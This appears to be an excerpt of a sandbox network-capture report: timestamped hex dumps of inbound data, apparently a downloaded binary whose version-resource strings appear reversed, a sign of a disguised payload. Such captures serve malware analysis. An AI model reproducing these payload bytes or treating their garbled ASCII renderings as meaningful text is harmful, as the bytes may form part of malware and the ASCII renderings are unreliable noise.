                                                      2022-05-14 13:17:12 UTC415INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2022-05-14 13:17:12 UTC416INData Raw: 73 00 6e 00 61 00 72 00 54 00 00 00 04 00 24 00 00 00 00 00 6f 00 66 00 6e 00 49 00 65 00 6c 00 69 00 46 00 72 00 61 00 56 00 01 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 1f e8 74 ab 00 01 00 00 1f e8 74 ab 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 32 00 00 00 00 00 00 03 32 00 06 80 54 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: snarT$ofnIeliFraVD?ttOFNI_NOISREV_SV422TH0
                                                      2022-05-14 13:17:12 UTC418INData Raw: 8c c3 2e a9 62 14 86 62 6c be 13 42 f2 ae 1c 63 75 94 51 35 fc f1 fe 92 33 2d 24 73 f7 35 25 cc bb a5 12 94 7c ab de 65 92 42 cb 31 4d 1b 4b 4b a5 0f 3d e9 f9 a2 d9 a0 7d ba bc b8 04 19 2f 22 0d 43 32 0f f7 dc d0 aa 52 e9 d9 69 c1 9b ed 81 5f c3 b8 fe de a1 cc 48 04 2c 05 45 98 01 2d 50 aa 82 b3 49 fd a3 67 43 6a 9e 65 1d 30 92 3c 94 5a 47 1f 9d 9c 17 14 9f a2 96 15 50 71 6d e2 63 22 81 41 a9 1e 49 3f 87 1e 83 e9 c2 c6 0e 43 13 a6 ab 3b 73 24 72 0f 8c dc ff 41 02 69 df ef d4 20 4e e5 77 77 49 3c 4e 51 a9 55 2e f8 2d fd a5 c7 4d 26 6b be 22 8c f8 b7 ac aa c2 0b e8 db 1a 0c 99 9c 2a 90 0f db 56 14 fa 15 eb 76 1b c2 78 1d c2 69 21 e4 ce a8 2e 72 af da 90 bd 6b d9 b9 54 cd e8 fe ba 21 be f7 99 80 59 de dd ae 5d 3a 5f 96 2c f1 2e d2 4a 7b 5c cc d7 b4 1b 58 2d
                                                      Data Ascii: .bblBcuQ53-$s5%|eB1MKK=}/"C2Ri_H,E-PIgCje0<ZGPqmc"AI?C;s$rAi NwwI<NQU.-M&k"*Vvxi!.rkT!Y]:_,.J{\X-
                                                      2022-05-14 13:17:12 UTC419INData Raw: be 21 e0 1b 6d d7 2b 83 bb 51 c7 4e 65 7a 4f 57 f5 2a ba eb b1 53 88 ba b5 c0 b2 b5 81 78 1a 04 67 02 9a eb b1 f2 4e c2 63 b3 1b aa 86 80 89 12 5e 29 37 86 7a 94 54 18 6f 48 ee 5d 21 f9 81 26 ff b6 7c ed c4 b7 cd ff 21 70 6b af 92 34 78 e7 7e 00 f4 6b 88 76 2e ba 2f b0 a0 71 58 04 4a af 62 20 fe fe 3c 46 72 45 df 12 20 1a 6d ab 82 de 83 3d f1 ba 83 69 97 a1 8f fe 98 4a 6e 37 e3 90 ec ce 8b 0b 95 1f 90 a5 ad ab 85 64 1c b9 1b c7 8f 98 f4 54 a9 5d 82 cd af 66 01 0e 26 1c b2 61 87 1d c0 ee a2 86 27 17 d1 7e cc db 85 2e a9 22 f9 60 26 81 6f d4 62 52 21 8e df 33 c6 cc 34 b1 a2 7a ff d5 10 73 b5 71 77 24 19 92 9b 46 24 7e 64 0b 4a 73 9d 36 5a 6f 53 03 6d 92 f6 0b a2 4a 4f d0 df b6 97 14 49 78 7f 3c f5 e0 f1 58 fa 53 b8 80 1e 25 4f 68 c7 a8 13 88 4f 1a a6 32 51
                                                      Data Ascii: !m+QNezOW*SxgNc^)7zToH]!&|!pk4x~kv./qXJb <FrE m=iJn7dT]f&a'~."`&obR!34zsqw$F$~dJs6ZoSmJOIx<XS%OhO2Q
                                                      2022-05-14 13:17:12 UTC420INData Raw: ba c5 6d 9d 57 50 c1 dd bb 7f 1b 86 ba 68 6c 1a 52 d5 db 23 4a 87 20 da 85 2d c3 72 a6 d7 d0 f4 49 c1 f7 16 d3 76 92 d0 bb 17 45 af a8 3b 3c 67 c0 53 96 a9 f0 21 09 5a e7 d6 65 b5 5e 5b 97 bb 07 1b 07 fb b7 97 c8 cf 5e 54 e5 a5 39 c7 21 2d b5 91 80 a9 62 71 1e eb b9 7e 96 2d 2f 0c 90 7a 84 0b df 33 9f 23 e0 65 d4 5f 7f 15 be ea 67 a0 e2 22 91 aa 81 35 7d 09 0b d5 5e f6 39 28 df 36 1f 7a c4 a6 ed f5 78 39 92 a7 2d 5a 86 82 4e 1c 3f 6e f5 db 58 e7 b0 88 81 14 96 a2 98 e1 35 94 50 75 f9 11 af 1d 18 48 27 41 6d 89 f5 f2 9a 69 b6 26 b8 10 60 30 c9 d5 96 ab c7 54 1e 85 73 7a 81 03 2e b2 ca 8e 4b 7a b0 3c 9f 93 61 7e ee bc 87 90 de cb e5 3d 34 8a 5d 25 60 a0 48 79 2e 0a 43 88 5a ec 38 8a 50 bb 73 7f 51 db 87 98 5c d3 8a 6b 6f cb 5d ab f0 ad d1 5c ca d1 9a 11 0e
                                                      Data Ascii: mWPhlR#J -rIvE;<gS!Ze^[^T9!-bq~-/z3#e_g"5}^9(6zx9-ZN?nX5PuH'Ami&`0Tsz.Kz<a~=4]%`Hy.CZ8PsQ\ko]\
                                                      2022-05-14 13:17:12 UTC422INData Raw: 1b 7b 37 cb 75 4f bf 1d 28 03 ac 11 8b 35 5b fb d8 ac 5f 73 1d 74 24 c8 ee a7 a4 9a e1 1b 5a f8 79 34 ef be b8 b2 f7 59 b1 ac 49 7d 88 dc e2 3c df eb 25 7d 17 38 74 67 de 87 c1 28 38 c9 90 9f 21 a4 85 ac 6b f9 f4 3a 72 0d bf 63 08 9a 09 9a ec 8d 35 1c 6e c8 6c 59 ac 5e 24 8b e8 19 a0 75 58 d1 cc 0a ff e7 19 bf 48 97 1f 35 b1 8a 39 a3 be 37 20 d3 6c 93 a4 30 0b 7c 2a a4 d8 3f cb 3f c9 3d 8b 50 e1 99 5c 63 30 ce a4 9f 48 d2 99 5e d7 89 c7 a0 11 05 c9 c6 c7 f7 9e 1a 4f cb da fd 24 76 18 f9 72 75 0c 2f 43 64 6e ec 5a 44 fd 5a d3 4d 6a e9 c0 86 e8 51 a3 bf 75 96 56 07 26 77 a6 b3 0d 12 41 fb 5b 03 36 f0 38 a8 ff c4 a7 46 9e 5c 75 38 b4 46 9a d9 33 bf c8 08 52 a0 d8 cd b2 fb f1 01 4d bb 72 39 c9 5c 48 08 15 29 df af a1 bc 8e 62 93 40 b6 34 72 6f da 5f b7 d2 39
                                                      Data Ascii: {7uO(5[_st$Zy4YI}<%}8tg(8!k:rc5nlY^$uXH597 l0|*??=P\c0H^O$vru/CdnZDZMjQuV&wA[68F\u8F3RMr9\H)b@4ro_9
                                                      2022-05-14 13:17:12 UTC423INData Raw: 96 46 17 e2 93 08 c7 a2 1b a8 62 06 aa 9b b4 22 53 69 cc 35 4c 2e a1 b6 f9 38 54 f3 91 b7 e8 ee 7f af 8e b1 ff 81 b9 f7 4b a1 70 a2 d8 e0 4b af c1 fb a5 21 44 7f f6 77 da 1b 95 8b 47 16 22 ed 71 21 dc 34 ba 9c fa 5b 8d e8 10 f9 26 dd a0 80 a3 1b 53 5e 25 3b 6f ee 8a a0 e6 fe e3 a7 8c c0 db e7 ac 31 b6 79 1c 48 ba d0 80 a1 3a cf e2 ec c6 1e 64 70 ab 02 1d 5e 69 77 3c 2e bf 93 52 11 9b 26 66 ff be 64 ad 55 77 5f d1 cf 3e dd b3 2f 45 9a b0 40 d2 6e 1e c7 e3 03 37 d1 7d 9a 16 7d 3a 46 33 ad fc 93 f8 be 75 9b 83 2b d8 72 0b cf fd ec 4a 5d 0a 33 95 3c 00 fc b3 87 3f f0 4e 99 07 16 ca fa cb db c9 1c f3 f2 9d dc 1a d1 91 f7 4b 1c ca 19 41 4e 32 cf ab 06 22 8d 5f 9d a3 bd a5 0c 98 0c ad c3 ba 34 50 c0 6f f0 8b c2 57 f5 91 6c d9 ce a0 7a 00 b7 18 81 e7 5f f2 18 69
                                                      Data Ascii: Fb"Si5L.8TKpK!DwG"q!4[&S^%;o1yH:dp^iw<.R&fdUw_>/E@n7}}:F3u+rJ]3<?NKAN2"_4PoWlz_i
                                                      2022-05-14 13:17:12 UTC424INData Raw: 83 31 23 1b 3a cf 65 c5 52 b6 d5 37 3f 92 32 47 04 f5 c6 66 1c cd 7d 80 6f 57 d5 61 16 4c 17 ce 85 38 8d 39 3d eb 06 67 14 a2 a9 35 89 9d 57 2a 88 b2 44 67 87 d0 f1 c2 e2 b8 fc c5 c5 78 ba 5a 0b 6a f5 99 3d f5 47 e4 e9 24 ad 13 b6 ea 25 89 4f f2 cb 58 e3 57 31 aa 83 e1 fa 10 51 1b a8 3b 8f 41 ad 28 f6 96 02 18 c4 1b 67 89 93 f2 26 09 43 ec e4 08 66 b6 e3 f3 c6 86 c0 de 21 36 1c 72 83 02 b8 da 93 20 35 3b 23 ad 8f f1 ee 6b fa f8 58 88 e6 f5 05 e8 b3 5d 6a 22 d2 a2 cc e3 1a 10 2a 85 f0 23 1c a3 4c 8f 88 c7 d5 2b fd 99 a2 fd 09 ca 62 02 0e 32 99 3f b5 e5 02 ac 44 be 93 3f ac 38 66 1f 97 5b bd 20 d8 9e 46 f0 51 51 94 f6 fe 52 28 35 19 c2 52 f7 09 b8 d4 c2 3a 3d 02 79 57 ce 81 52 2f 39 bb 18 00 76 89 a3 bf 02 cf 25 91 90 fb 04 ca 9c ac 3f 4e 54 64 c8 e9 9e 66
                                                      Data Ascii: 1#:eR7?2Gf}oWaL89=g5W*DgxZj=G$%OXW1Q;A(g&Cf!6r 5;#kX]j"*#L+b2?D?8f[ FQQR(5R:=yWR/9v%?NTdf
                                                      2022-05-14 13:17:12 UTC426INData Raw: 50 ae f6 2b 81 ff eb 81 89 99 6d a1 63 89 8c c5 d6 99 99 c5 1b 44 f0 9e 8b 11 32 31 92 85 28 a7 42 a1 fe 18 34 19 ed 27 d5 e9 6e 96 12 dd f9 70 ce 91 2b 8b c3 6b b0 07 26 f3 65 70 b8 59 57 12 00 20 c1 92 cf 57 68 7a 04 fc a4 4c 18 cb b9 2d 2d d9 d7 b2 84 f0 d6 fd b6 06 26 e4 0f 67 6b 18 c5 ee 5c 42 83 e0 2c 90 0f c7 74 03 30 43 0d ad 58 a3 33 ba 2d b7 3f f8 44 0f 20 04 e2 27 7c c1 9c 6c cf 1e 17 da f5 98 e7 df fe a2 4d b2 32 0c 59 08 03 58 45 10 f3 75 6a 0e 89 ea 1b 6a 2b 73 44 e7 62 e2 1b a3 63 7d 60 5c 9f 41 a2 f0 bb 70 84 ae 18 41 32 3a 3c 27 f7 00 48 f4 46 4d 0e ed 17 b2 40 c5 ce 0c 58 ac 80 fc b2 1e 80 19 bb d4 25 08 5a f7 85 86 e0 27 fb 10 fb 5a bb ba d1 fd 65 c8 cb 7c 49 03 a4 8a 94 81 45 17 b7 a2 38 60 4e dd 71 7d b7 b2 10 c2 42 d7 b7 9e f2 af 6d
                                                      Data Ascii: P+mcD21(B4'np+k&epYW WhzL--&gk\B,t0CX3-?D '|lM2YXEujj+sDbc}`\ApA2:<'HFM@X%Z'Ze|IE8`Nq}Bm
                                                      2022-05-14 13:17:12 UTC427INData Raw: 83 79 22 fc 21 44 4a 0d f8 60 4e d7 34 67 c9 bc c8 f7 62 b0 d6 34 a0 35 61 af 19 78 fa 24 95 89 30 25 2b 3b 7f 40 bf c5 41 68 8b 87 05 0a 1c 65 23 17 9c c8 6e 11 5f d9 3a cf 32 c0 db 21 18 99 7f 4b 72 e6 e7 a6 8a c3 0b 64 4e 2b 90 da 54 7f 17 b6 03 0d 8e e8 a5 54 e4 44 2c 60 2a 4a 3e f3 a6 80 0a 99 64 d2 6e 4d 0a 45 f2 65 97 32 77 d4 55 df 0d 69 8e 06 62 c2 9f 9c bb 9f 7b 76 ec 25 09 0b de 71 33 01 ab f1 0b 3e af 7e 8f a6 03 31 35 dd d6 76 49 73 e3 25 d6 f0 58 ef a1 c6 84 c6 68 7a 95 e6 74 79 ea b8 a6 ec e3 12 ec 34 33 41 dc 27 43 52 0c 54 84 80 0d 5d 79 2f b1 b1 46 1b cd 75 77 1d 88 a6 e7 8a a1 26 17 c8 5e db eb 0e 72 aa 39 9a 70 d7 eb 65 80 9b 03 19 18 3e 95 36 b0 9d f3 fc 12 fb 8f 50 d2 33 8b dc b0 da f7 70 a3 56 5b 03 88 ba 31 78 f4 da 08 97 d0 4c cb
                                                      Data Ascii: y"!DJ`N4gb45ax$0%+;@Ahe#n_:2!KrdN+TTD,`*J>dnMEe2wUib{v%q3>~15vIs%Xhzty43A'CRT]y/Fuw&^r9pe>6P3pV[1xL
                                                      2022-05-14 13:17:12 UTC428INData Raw: 5a 20 87 1c e0 d5 03 48 7e ce 17 51 b8 59 80 59 da f3 6c f4 0e 01 fc 05 16 0e 58 b5 4a 3d fa e5 8e fd a6 1b 0b 8e dc ec c3 dc 26 de eb 66 b3 80 7d 4a 7e 2c c2 bd d6 49 25 ae e2 15 bb 4c 0e 5c 42 75 26 e4 9f 81 06 42 51 07 00 45 d7 ff 25 2a cb 1e 44 7b 84 4b a8 00 8d 1c 03 2e 58 67 0f 98 e8 84 4f 88 a2 06 fc 08 98 3e 9c 74 b6 40 f8 3d 8f 41 2b af 9d e2 21 7d 9d 0b bf b1 a5 fb 1f a7 e1 3f 99 ff 3c 89 6c dd 0d 1b b4 54 e4 ac 56 3f 2c 61 0a 3b b7 98 bd f3 7f df e7 ee 1a 25 34 92 14 19 c2 8a 6b 66 53 36 4a ae 1f 34 df f4 ed e6 37 a6 a1 17 6f b5 05 34 16 f6 c3 82 a3 cd 63 cb f6 95 16 05 cc 6a 58 af b9 fb 5c ae 8d 55 68 99 34 1a 30 79 7a ba e0 ce 65 7a 24 89 98 57 20 16 b9 eb 21 36 72 2c 8a 42 dd 91 35 b4 df 9d 63 ea 54 88 1b 83 67 bd 60 73 de a7 e8 f6 8c f3 8a
                                                      Data Ascii: Z H~QYYlXJ=&f}J~,I%L\Bu&BQE%*D{K.XgO>t@=A+!}?<lTV?,a;%4kfS6J47o4cjX\Uh40yzez$W !6r,B5cTg`s
                                                      2022-05-14 13:17:12 UTC430INData Raw: 51 44 a7 65 d5 86 52 d7 b4 58 e5 cc 5d 8d 7f 75 5d ed 28 21 83 83 5d 93 b3 01 ca 80 5c 7e 3a 2b 45 9e 60 2e c6 6c c5 96 f9 e7 18 98 84 f9 de ec 31 0f 34 56 70 b4 a8 47 bc f0 d0 b8 ed 37 ab 66 63 a9 09 d2 37 d2 d2 03 bc 2f 99 a1 fa a6 75 bd cc 2f 91 53 a0 f2 0c cc 51 ec 12 92 a3 f3 c8 1f 38 f3 3c b4 8f 3e d0 26 92 31 86 bf b1 6b 27 c4 92 70 88 2b d1 47 0f e9 c6 62 c7 8c ca 29 1a 9b 84 d7 8f c5 46 f1 bf 3e 9c 58 56 c2 d2 6b c8 d2 95 99 1c 02 91 8f 17 14 6b d4 e4 98 53 f5 1c 0e af fa a2 f0 d9 73 19 c4 86 60 4d 14 ef 11 59 09 87 db 68 fe 4c 72 a9 3a 70 c4 3f 57 97 64 3b c0 e2 55 8c 45 a9 f7 95 5b a4 31 e4 f7 c2 a4 db 11 64 e3 8e 00 c5 31 04 f6 b3 3a a0 98 d5 10 0f a6 58 b9 e3 c4 cb e5 c5 28 44 1d 09 a3 90 19 ad 62 88 bb a4 bf e7 ae 0a 29 18 f4 22 42 75 e1 26
                                                      Data Ascii: QDeRX]u](!]\~:+E`.l14VpG7fc7/u/SQ8<>&1k'p+Gb)F>XVkkSs`MYhLr:p?Wd;UE[1d1:X(Db)"Bu&
                                                      2022-05-14 13:17:12 UTC431INData Raw: 70 4a d6 8d 03 e5 10 41 57 37 c0 6c 42 8e e7 83 77 59 5e 51 7a eb 23 ef b9 d3 58 8e 8f d9 bb 38 ed 20 70 ed 5f 24 1b 06 a4 e9 50 c5 ff 80 ad f7 83 9c 2b 9a 84 20 5a f7 5a 42 b3 f0 97 81 4e 98 1b 87 86 71 af fb 3d 9c 80 29 09 ba 47 d5 58 49 46 94 c6 a9 1c da 1d b0 7b ad c0 d4 98 f2 3b 3c 6a bb 66 14 20 f1 ff fe e4 20 55 16 f6 4d c6 1d 61 85 d4 af 6d ca fe 4c f3 a6 9f 61 d2 a5 eb 9f c6 1e 61 68 b4 95 a9 72 64 cd 7d 43 4c 2f 33 4c f6 84 25 0f 85 05 5b db 4e ef 3c 64 13 4f 77 e6 8c a7 9a b8 d6 18 72 5c e9 51 9c 5e 91 4f ac 5e ff 13 a5 81 a3 77 e9 27 76 d7 6d 9b 73 db e6 aa 51 cf 66 75 43 a5 85 b1 4f 2f a9 c0 8e e4 78 03 91 a4 f0 a8 9a 23 6b 5f 27 3d 21 70 b9 a4 77 8b 6c 14 cb c7 33 03 40 a1 21 a6 01 48 b2 f7 f4 2a 4d dc b6 57 62 d8 c9 ad e3 d9 22 67 83 fa 5f
                                                      Data Ascii: pJAW7lBwY^Qz#X8 p_$P+ ZZBNq=)GXIF{;<jf UMamLaahrd}CL/3L%[N<dOwr\Q^O^w'vmsQfuCO/x#k_'=!pwl3@!H*MWb"g_
                                                      2022-05-14 13:17:12 UTC432INData Raw: 78 2a b1 b5 07 fc 22 a7 ee 53 d2 db db e3 eb f7 70 73 a1 fe 08 a8 69 6c bf 96 75 2a 2f 5f 84 50 9f 72 5b c2 d2 14 cc a8 80 8a 02 3a 86 e4 8d fd 3b 2e 77 0a 7d 3c af 98 49 bd 2f 66 9a 9f b1 c2 58 33 a6 ce 62 8f 58 06 3d 6b 8f 4f 96 c3 7b 7b 15 18 03 a7 8d 1f 6b 6e da b4 d1 19 df a1 8a d9 4d 92 0c 52 ac 5d f2 5d 3d 18 55 d0 b5 a0 f8 65 45 6d 7b 3c 79 42 d6 dc a6 78 c0 49 3a c4 af 24 4b fa 5f 12 c0 61 a5 20 02 fa 19 cf 8f f2 f2 83 ab f7 18 43 a4 0c 9a ec 75 0f 82 00 9e 8e e1 ba 3d b9 ea 43 80 fe 85 6c c1 3b 97 09 f0 eb 2f d4 a7 f0 72 7e 55 47 d5 66 83 53 e9 56 7f 0f db a3 f7 c1 19 9a cd 77 69 5a ed d8 65 6e bf 38 5d 5a 7b d5 f0 45 a8 68 82 51 8e d9 7d d1 dc 64 01 f1 a9 4e e5 bc 0f ee 25 9a 4e 72 b2 d0 87 5d 96 bb cd 2d 14 c1 3c c0 19 29 76 87 33 b7 ec 50 18
                                                      Data Ascii: x*"Spsilu*/_Pr[:;.w}<I/fX3bX=kO{{knMR]]=UeEm{<yBxI:$K_a Cu=Cl;/r~UGfSVwiZen8]Z{EhQ}dN%Nr]-<)v3P
                                                      2022-05-14 13:17:12 UTC434INData Raw: 24 d1 1f 54 4e c2 6c 5b 58 07 33 7b 47 37 6a 69 6b 3a ec 12 f6 4f 62 67 ec 92 47 c8 53 15 14 e0 44 f9 c5 30 e5 00 ed 26 d3 99 18 b5 f8 a6 60 a2 bc 69 ae f2 ff 9b 74 d8 11 0a 88 81 4c 48 eb cb 41 8c e1 26 40 a8 5d a1 a5 37 d3 ab 7a a5 e9 07 f0 67 30 db 58 96 bb 73 d1 74 31 e7 99 a9 f8 e8 e7 ba d8 93 dd c3 08 3a 5e 20 38 0d e3 00 bd ad d4 3d f5 f6 c0 51 e0 28 24 30 a6 66 8d f2 17 9d 5e ef ca 68 cd eb b5 1c 87 74 76 f5 20 cd f1 eb ca 09 fc f6 12 93 e3 44 6c a0 69 5b 40 df eb e1 0f eb a1 5c b0 df f4 63 af 46 f0 e9 38 0d 89 85 b4 11 df ad cf 54 3c fa 40 dd a6 58 47 44 5f b9 0d b3 24 9a 52 45 71 76 ab 2c ed 07 5a 5e 31 0c 37 da a3 11 36 0b 0e 8d 0b 61 5a 7b 87 ad cb 67 c9 53 29 fe ab d1 99 f5 9f 6f d5 fa 1d 94 1c 4a ff a9 bd bd 14 e5 63 6f 73 40 42 39 5f f9 16
                                                      Data Ascii: $TNl[X3{G7jik:ObgGSD0&`itLHA&@]7zg0Xst1:^ 8=Q($0f^htv Dli[@\cF8T<@XGD_$REqv,Z^176aZ{gS)oJcos@B9_
                                                      2022-05-14 13:17:12 UTC435INData Raw: 13 79 96 3a 7f e6 b1 fa 8b cf 07 59 94 d5 3a dd 0f 6c 84 d1 1f 7f 00 52 c1 2c 1c cd 20 c3 e2 54 5d 7f cc 27 da f5 b3 23 7a 5c e4 45 06 e3 fd 33 f8 d0 61 5a 1c 64 11 b3 aa 10 c0 ab 1c 18 b7 64 aa ca 22 a8 ab 8b 3c d7 79 02 fa 6b 53 04 df 02 b4 13 2a b2 0d fa e2 ff 4b ec 4f 11 3c 70 a1 80 f8 9b cc f9 31 d3 1b 9c 3a 07 ef b7 23 d0 57 0a 89 66 90 94 8f 7b 34 9e 81 b7 76 1e 16 52 e6 19 b3 84 15 d7 82 98 81 02 ac 7c 1a af ba 8c 28 ca b2 9d 2f 36 c8 a3 cf 79 4d e0 89 11 45 ea 65 73 49 2e 1c a5 0e 07 4b 90 4f 51 a1 b7 88 c3 b0 95 a5 df ee 39 e0 08 77 60 27 56 43 49 86 b3 d0 10 8c 2f c4 db aa ac 26 1f ec ac ac a1 68 34 f0 0b d6 a4 1f 94 40 eb 2d 84 68 36 37 05 f4 a7 f6 5e b2 8e 13 a3 7b 29 0b ed 90 57 b4 1a 6b 54 29 e1 f6 16 d3 9d 6e bd 73 b1 d1 85 64 8a c2 98 29
                                                      Data Ascii: y:Y:lR, T]'#z\E3aZdd"<ykS*KO<p1:#Wf{4vR|(/6yMEesI.KOQ9w`'VCI/&h4@-h67^{)WkT)nsd)
                                                      2022-05-14 13:17:12 UTC436INData Raw: fe 36 86 f5 6b 4a 55 66 4a 32 21 46 7e 2a b1 ca 0e c1 78 46 21 3f 32 6e 83 0d 34 34 95 5f 1f 2a 5e f3 e8 af 45 98 52 2c a9 a1 c7 14 28 4b 1d b6 7b e9 38 61 50 a5 00 ce 59 da 84 01 dd 03 e5 3d 9f fe 6e 5c 96 03 6a 6b ed 95 5b ae 03 e6 3e 23 79 28 b5 b1 42 87 27 ec b5 da d5 86 7a e9 cb fc 18 d4 fa 0b 09 86 73 7c 5a 5a 58 e8 03 30 67 9a c3 cf 2f 59 02 a3 66 b4 9e cc 0c 97 28 5c 19 7c 5e 21 85 e1 8b 7d e6 15 1d e7 89 b7 bf b0 69 6d 1b ce 29 a8 db fc b9 ed 7b fe 94 4c f9 ad d5 c4 a9 13 e2 63 f5 60 e2 85 fd 9d d3 ee 0c 22 a0 01 e7 4e 7f ab 08 3f b4 61 4d a2 83 cb 18 61 e6 ee 3c a4 1c 26 4d af 7c 98 eb 49 d6 a3 f8 96 94 08 0e 86 7f bd 6b 4a 4e 85 76 aa bd a9 11 ce a6 58 90 a4 c7 1f 7d e6 71 8b 65 40 65 11 72 a8 d5 37 73 f1 df bd 53 36 0c 45 2c 30 06 d2 7c 16 29
                                                      Data Ascii: 6kJUfJ2!F~*xF!?2n44_*^ER,(K{8aPY=n\jk[>#y(B'zs|ZZX0g/Yf(\|^!}im){Lc`"N?aMa<&M|IkJNvX}qe@er7sS6E,0|)
                                                      2022-05-14 13:17:12 UTC438INData Raw: 53 4b c6 2b 40 21 28 13 1f 50 3f fe b5 6f ba 71 af 1a c5 5a 84 47 ec 1c b3 27 61 b9 37 8e 64 1d 1d 5b a9 23 97 e5 ed 7b c5 9f 0b 5d 22 9d 86 ae 9d 4e f7 49 e3 c3 af 91 44 1f 89 d7 39 f4 e2 64 c3 25 27 9b 43 ea 57 7b 43 8e 8b e7 21 5f 3d e8 12 41 44 2c d7 2d 8e 00 72 ff 88 41 31 ce 4e 93 51 f9 25 a9 1a ed 22 72 1a 67 5d d4 98 f0 25 9b 78 8c ca d2 7b 1e 3c 0a 4b f4 89 1c 2c 3c 3f c0 87 8c fc a8 84 a5 89 e1 e8 30 a6 4d 06 3f 27 1e 7b cf 00 e8 4c 3f 80 55 d1 dd 47 ec 82 58 55 ba a0 48 13 af 58 38 3d 1b 87 f5 4d 54 a2 93 38 21 2c 1c c7 37 8b 9a 6e 72 ba 79 91 70 ed f8 8c 85 66 ed c9 9c d2 b8 b1 32 e0 b3 16 fc d6 10 1f 10 61 f8 02 c4 4c 45 c2 94 7c 93 05 1b db 5d b7 5e 8d 06 96 f7 f3 55 cb d5 2c 6d fd 8a c6 58 03 38 30 7b e7 11 e7 a6 b1 2c 8c a6 7e 47 3c 60 dd
                                                      Data Ascii: SK+@!(P?oqZG'a7d[#{]"NID9d%'CW{C!_=AD,-rA1NQ%"rg]%x{<K,<?0M?'{L?UGXUHX8=MT8!,7nrypf2aLE|]^U,mX80{,~G<`
                                                      2022-05-14 13:17:12 UTC439INData Raw: 5b 02 a2 19 fd 37 de b4 4d 07 5e 6a aa 39 c4 43 c1 96 ef d0 c1 e1 c8 8e 34 50 fd 64 b7 70 09 26 12 65 e5 65 a3 93 92 31 fc 19 8f 2c 5e f5 89 6e 39 b1 ca 96 7f 16 e5 ae 96 f6 bb fd b8 d5 7a 68 11 5f 8e 6e 3c ec 27 ec 49 17 d8 92 6c ec f6 f5 c3 8c ff a0 cf ca eb 69 b5 a1 c5 db 34 81 b7 8f 05 fa f6 7b 03 ce bb 7e ef ed 6a 1b ad 10 16 bb f8 70 55 6d 94 89 7d 5e 54 80 66 0f c8 4e 07 5f 54 b6 ff 77 d4 d8 cd a9 b6 77 0a 87 4c ba d4 d9 6d a8 c7 38 fa 51 43 5a a3 0f 8a 29 ed 95 12 e3 3c 96 74 f3 ad 69 ae e9 81 b3 18 69 38 5f 9f 37 bf ec 41 af 5a e3 82 da 69 6c db 81 2c 21 3c ff 54 cc 5e 23 5d b4 48 34 9a e3 19 0a 06 8d c2 6f dc 1b 35 0c 3a 57 8a 5a eb f0 2c 80 ab b6 72 22 b1 10 a6 9b e8 b6 9a e9 a4 97 be ba bb 24 a3 ab b0 33 7d 80 53 5d 4b b1 23 64 91 2b 54 cd e4
                                                      Data Ascii: [7M^j9C4Pdp&ee1,^n9zh_n<'Ili4{~jpUm}^TfN_TwwLm8QCZ)<tii8_7AZil,!<T^#]H4o5:WZ,r"$3}S]K#d+T
                                                      2022-05-14 13:17:12 UTC440INData Raw: db 8c 2c 3b e3 83 2f f7 52 35 db f1 c9 9d 08 9c bb 52 da 56 aa c5 f0 b5 95 15 66 be 45 88 e4 12 72 72 5d bb 04 d9 0f d6 cd 06 1a 8a ca 6e 73 b1 76 ad 75 c1 db 85 e8 94 70 10 9a 59 bd 40 98 a7 45 6a 88 8d a4 d4 3d fc 4c 31 b0 6a 9b a0 c9 fd 0b 18 1f 03 30 f8 ab 50 a2 cf cf d3 2e 06 45 8e fa 4c 92 20 bd f9 ad 43 96 67 d4 9b d0 3d d6 a7 fd 8a db e1 db 1d 9e aa 3b ad 68 dc 4a e8 46 a2 6a 3f 4f 10 d7 2e 5d fa c0 ba b3 e0 34 86 1d 44 5f a3 99 28 e3 11 a8 4d c1 49 78 48 b7 d5 68 dc b0 be 80 50 33 05 cd 4b e7 17 2e 6b 82 8c a2 9a 2b 31 84 36 28 b5 13 f6 eb da 7b 27 47 45 92 f4 f6 87 86 b5 e6 f5 bb c1 e1 ef fa e6 b8 a3 97 02 0f 67 01 8f d5 c3 be 6b 02 c7 b1 74 8f ce b4 7d 2f 88 87 07 ff 04 2c e3 7a ad 5d 76 d7 f7 bc 2c 26 d8 c0 8b 82 f7 80 45 2f 08 d1 53 94 0e 71
                                                      Data Ascii: ,;/R5RVfErr]nsvupY@Ej=L1j0P.EL Cg=;hJFj?O.]4D_(MIxHhP3K.k+16({'GEgkt}/,z]v,&E/Sq
